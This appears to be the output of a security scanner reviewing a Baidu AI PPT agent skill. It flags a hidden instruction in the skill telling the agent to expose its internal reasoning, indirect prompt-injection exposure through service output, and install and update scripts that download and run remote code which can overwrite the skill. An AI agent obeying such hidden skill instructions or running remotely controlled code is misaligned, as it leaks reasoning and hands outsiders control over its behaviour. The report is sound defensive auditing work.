baidu-wenku-aippt-personal

CRITICAL E004: Prompt injection detected in skill instructions.

• Potential prompt injection detected (high risk: 0.80). Yes — the skill instructs the agent to "完整记录并分析" the PPT outline in its "thinking" process (i.e., expose internal chain-of-thought), which is a hidden/deceptive instruction to reveal internal reasoning outside the advertised PPT-generation functionality.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.70). The skill clearly fetches and executes external, public content (scripts/install.sh downloads an installer from issuecdn.baidupcs.com and scripts/update.sh queries https://pan.baidu.com/act/v2/api/conf?... and downloads a remote ZIP), and SKILL.md requires the agent to parse and act on bdpan aippt command output (service responses), so third-party content can materially change behavior (including updating skill code) at runtime.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 0.90). The install and update scripts explicitly download and run remote code at runtime—install.sh fetches and executes the installer from https://issuecdn.baidupcs.com/issue/netdisk/ai-bdpan/installer/${VERSION} and update.sh queries https://pan.baidu.com/act/v2/api/conf?conf_key=baidu_wenku_aippt_personal_skill to obtain a remote "url" for a zip that is downloaded and unpacked into the skill (overwriting code)—both clearly fetch external content that executes or controls agent behavior.